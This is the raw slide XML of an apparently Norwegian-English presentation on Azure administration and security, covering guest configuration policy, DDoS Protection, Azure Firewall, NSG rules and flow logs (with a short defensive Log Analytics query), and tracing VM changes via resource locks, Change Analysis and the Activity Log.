                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Group Policy for Azure!</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Based upon DSC for Windows / Linux</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Will be replacing DSC in Automation</a:t>
            </a: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rPr>
              <a:t>GuestConfiguration Extension needs to be installed (Can also be done by its own Policy</a:t>
            </a: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rPr>
              <a:t>Provides machine with its own managed identity</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(If provisioned via the Azure Portal)</a:t>
            </a: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Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA97FAD7-691E-4283-985B-6CB65A06FE32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5015939" y="1412674"/>
            <a:ext cx="6657975" cy="1440320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26421513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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133876" y="406835"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Network and traffic flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45677466-D8AF-4E94-8B95-93843D470180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384777" y="450164"/>
            <a:ext cx="3995694" cy="5854382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>DDoS Protection</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Protected OSI Layer 3&amp;4</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Currently </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>expensive</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Protects everything with its own public IP</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Out of order packets are dropped at edge</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endPar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rPr>
              <a:t>Azure Firewall</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Layer 4 Statefull firewall</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IPS/IDS and TLS inspection for east/west traffic</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Threat intelligence</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Support IP Groups</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endPar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rPr>
              <a:t>NSG Regler</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NIC / Subnet</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Service Tags (Five-tuple) </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endPar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endPar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endPar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FDB833C-7B63-4933-B1A2-8A780A5FF8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4363532" y="1024499"/>
            <a:ext cx="7437513" cy="5401051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bilde 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DD6099-FBA8-40A4-A04B-1A8FA2638BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4540852" y="2948174"/>
            <a:ext cx="7256778" cy="3438782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45193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45793E-8E14-4A90-BE7D-52C4B0C20EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501637" y="274888"/>
            <a:ext cx="11102266" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Azure NSG Flow Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B12651-DDEF-4E4B-ACD8-26653C0FEE61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528721" y="1415570"/>
            <a:ext cx="6562725" cy="4905375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1261C2B2-131D-4518-92B4-A86205F7ABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="5854382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Provides Insight into all network traffic going trough an NSG</a:t>
            </a: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rPr>
              <a:t>Data enriched by Microsoft</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Is traffic from a «bad» address?</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Is traffic from another Azure service?</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Is traffic from a known location?</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endParaRPr kumimoji="0" lang="nb-NO"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rPr>
              <a:t>Data will be availble in Log Analytics</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>And other fancy dashboards</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Can also use 3.party as Cisco Stealthwatch</a:t>
            </a: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rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AzureNetworkAnalytics_CL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="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None/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	| where SubType_s == 'FlowLog’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="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None/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	 and FlowType_s == 'MaliciousFlow'</a:t>
            </a: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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C289ED-E77F-482F-9A7A-6D4F8D221747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676138" y="1460585"/>
            <a:ext cx="7355682" cy="3862593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6996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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449656" y="665515"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Who did changes to the VM?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF70C643-E1DD-45B3-A1EC-690B9335948B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="5854382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Resource Locks</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If you are using IaC you need to mace some adjustments to ensure locks are removed before modification</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endParaRPr kumimoji="0" lang="nb-NO"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rPr>
              <a:t>Change Analysis</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Gir innsikt i endringer på Azure ressurser</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Provices access into changes in Azure changes</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Instead of trying to understanding all the JSON logic</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endPar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r>
              <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rPr>
              <a:t>Activity Log</a:t>
            </a:r>
          </a:p>
          <a:p>
